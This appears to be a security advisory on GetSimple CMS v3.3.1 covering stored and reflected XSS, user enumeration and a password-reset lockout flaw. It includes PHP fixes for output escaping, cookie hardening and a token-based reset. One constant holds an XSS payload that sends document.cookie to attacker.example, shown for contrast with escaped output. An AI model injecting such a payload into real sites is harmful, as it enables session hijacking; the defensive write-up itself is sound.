GetSimple is an XML- and PHP-based, stand-alone, fully independent, lightweight Content Management System (CMS). After performing some tests it was found that GetSimple CMS v3.3.1 has several security vulnerabilities.
Persistent Cross Site Scripting
The administrative interface does not always properly sanitize its input. The Display Name field in the user's profile settings allows malicious code to be inserted; the value is stored and rendered again on later page loads, so the script runs for whoever views the affected page. This can result in session hijacking, because the session cookie also lacks the security attributes (such as HttpOnly) that would keep injected script from reading it.
Reflected Cross Site Scripting
There is also a reflected cross-site scripting vulnerability in the administrative interface. The file log.php takes a parameter called log and reflects it into the page without sanitizing it either.
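The two output patterns behind both issues above (a stored profile value and a reflected query parameter), next to the escaped form and the session cookie attributes that limit what an injected script can do with the session. This is an added example written for this page, not code from GetSimple; the attacker payload is constructed, and the /admin/ cookie path is an assumption.

```php
<?php
// Added example, not code from GetSimple. Shows the raw-output pattern behind a stored value
// (the Display Name) or a reflected parameter (log.php?log=...) next to the escaped equivalent,
// and the session cookie attributes that limit what injected script can do.
declare(strict_types=1);

// Constructed sample input: what an attacker would submit as the Display Name or the log parameter.
const PAYLOAD = '"><script>new Image().src="http://attacker.example/?c="+document.cookie</script>';

// Vulnerable pattern: the value is interpolated straight into the HTML response.
function render_unescaped(string $value): string
{
    return '<h2>Welcome, ' . $value . '</h2>';
}

// Hardened pattern: encode for an HTML context. ENT_QUOTES also escapes quotes, so the same
// function is safe inside double-quoted attribute values.
function render_escaped(string $value): string
{
    return '<h2>Welcome, ' . htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</h2>';
}

// Session cookie attributes. HttpOnly keeps document.cookie from reading the session id, Secure keeps
// it off plain HTTP, SameSite=Strict keeps cross-site requests from carrying it. The path is an
// assumption (GetSimple's admin lives under /admin/ by default); this must run before session_start().
// The array form of session_set_cookie_params() needs PHP 7.3 or newer.
function harden_session_cookie(): void
{
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/admin/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Strict',
    ]);
}

if (PHP_SAPI === 'cli') {
    echo "Unescaped: ", render_unescaped(PAYLOAD), PHP_EOL;
    echo "Escaped:   ", render_escaped(PAYLOAD), PHP_EOL;
}
```

Run it from the command line to see the payload once as live markup and once as inert text. Escaping at output time is the fix for both findings; the cookie attributes do not stop the XSS but take the session id out of reach of a script that does run.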
User Enumeration
The system displays different messages depending on whether a user exists. When the user exists, a message says an e-mail has been sent (or, in the video, an error message is shown); when the user does not exist, no message is displayed at all. An attacker can use this difference to enumerate valid usernames.
Non-Secure Password Reset Mechanism
The password reset mechanism immediately resets the password upon request and performs no verification. An attacker who keeps sending this request every X seconds can keep users from logging in, because the password is replaced again before the legitimate user can log in with the one just mailed.
Another side effect is that the user's e-mail address is bombarded with password reset messages.
An effective way to solve this is to send a one-time password reset link to the user's e-mail address (and make sure it cannot be replayed). Once the link has been used and the password successfully reset, it should expire. The link should also expire after a set amount of time if it is not used.
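One way to implement the reset flow described above, which also answers the enumeration issue in the previous section by returning the same message whether or not the account exists. This is an added example written for this page, not GetSimple's code: the user store and mail outbox are in-memory arrays standing in for the XML user files and mail(), the reset endpoint URL and the one-hour lifetime are assumptions, and the check() helper is hypothetical.

```php
<?php
// Added example, not GetSimple's code. A token-based password reset: the request creates a random,
// single-use, expiring token and mails a link; the password changes only when that link is used.
// The user store and mail outbox are in-memory arrays standing in for the XML user files and mail().
declare(strict_types=1);

const RESET_TOKEN_TTL = 3600;                                      // seconds an unused link stays valid (assumed)
const RESET_URL       = 'https://example.com/admin/resetpw.php?token='; // hypothetical endpoint

$users = [
    'admin' => [
        'email'         => 'admin@example.com',
        'password_hash' => password_hash('current-password', PASSWORD_DEFAULT),
    ],
];
$resetTokens = [];   // sha256(token) => ['user' => ..., 'expires' => ...]
$outbox      = [];   // simulated mail queue

function request_reset(string $username, array &$users, array &$resetTokens, array &$outbox): string
{
    // Same response whether or not the account exists, so the form cannot be used for enumeration.
    $message = 'If that account exists, a password reset link has been sent to its e-mail address.';
    if (!isset($users[$username])) {
        return $message;
    }
    $token = bin2hex(random_bytes(32));       // 256 bits from the CSPRNG: not guessable
    $resetTokens[hash('sha256', $token)] = [  // store only a hash, so a leaked store gives no live links
        'user'    => $username,
        'expires' => time() + RESET_TOKEN_TTL,
    ];
    $outbox[] = ['to' => $users[$username]['email'], 'link' => RESET_URL . $token];
    return $message;   // the current password is untouched: repeated requests cannot lock the user out
}

function complete_reset(string $token, string $newPassword, array &$users, array &$resetTokens): bool
{
    $key = hash('sha256', $token);
    if (!isset($resetTokens[$key])) {
        return false;                          // unknown, already used, or forged token
    }
    $entry = $resetTokens[$key];
    unset($resetTokens[$key]);                 // single use: consumed even if it turns out to be expired
    if ($entry['expires'] < time()) {
        return false;                          // unused link past its lifetime
    }
    $users[$entry['user']]['password_hash'] = password_hash($newPassword, PASSWORD_DEFAULT);
    return true;
}

// Hypothetical helper so the walk-through fails loudly regardless of the zend.assertions setting.
function check(bool $ok, string $what): void
{
    if (!$ok) {
        throw new RuntimeException("check failed: $what");
    }
}

// Walk-through on the constructed data.
$a = request_reset('admin', $users, $resetTokens, $outbox);
$b = request_reset('nobody', $users, $resetTokens, $outbox);
check($a === $b && count($outbox) === 1, 'identical message for existing and unknown user, one mail sent');

$token = substr($outbox[0]['link'], strlen(RESET_URL));
check(password_verify('current-password', $users['admin']['password_hash']), 'password unchanged until link is used');
check(complete_reset($token, 'new-password', $users, $resetTokens), 'valid link resets the password');
check(password_verify('new-password', $users['admin']['password_hash']), 'new password is in effect');
check(!complete_reset($token, 'again', $users, $resetTokens), 'replay of the same link is rejected');
echo "reset flow OK", PHP_EOL;
```

Two design points matter for the attack described above: nothing about the account changes when the request arrives, so flooding the form cannot lock anyone out (a rate limit per address is still worth adding to curb the mail bombing), and the token is deleted on first use before its expiry is even checked, so a captured link can be played back at most once.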
In my opinion this is the only secure password reset mechanism, rather than sending a new password in plain text to the user’s e-mail address.